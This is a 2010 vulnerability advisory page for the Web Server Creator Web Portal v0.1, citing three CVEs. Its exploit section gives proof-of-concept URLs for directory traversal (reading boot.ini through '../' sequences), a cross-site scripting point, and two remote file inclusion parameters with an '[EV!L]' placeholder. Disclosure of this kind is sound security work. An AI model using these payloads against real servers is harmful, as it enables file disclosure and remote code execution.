Web Server Creator - Web Portal v 0.1 Multi Vulnerability

2010.03.28
Credit: indoushka
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1113 | CVE-2010-1114 | CVE-2010-1115
CWE: CWE-79
CWE-94
CWE-22

======================================================================================== | # Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # Web Site : www.iq-ty.com | # Dork : All right reserved 2002-2003 (MSN/Web Server Creator) | # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : Multi ====================== Exploit By indoushka ================================= # Exploit : 1- Directory traversal (Windows) http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini 2- XSS http://127.0.0.1:80/1082_webserve-01/index.php?pg=forum 3- RFI http://localhost/1082_webserve-01/index.php?pg=[EV!L] http://localhost/1082_webserve-01/news/form.php?path=[EV!L] ================================ Dz-Ghost Team ======================================== Greetz : Ï ÈÈ + ÈÑÏ + Ûæã Ï K10 + K@MEL + ã + ÊÛ -------------------------------------------------------------------------------------------

References:

http://xforce.iss.net/xforce/xfdb/55725
http://www.securityfocus.com/bid/37841
http://www.packetstormsecurity.com/1001-exploits/webservercreator-traversalxssrfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top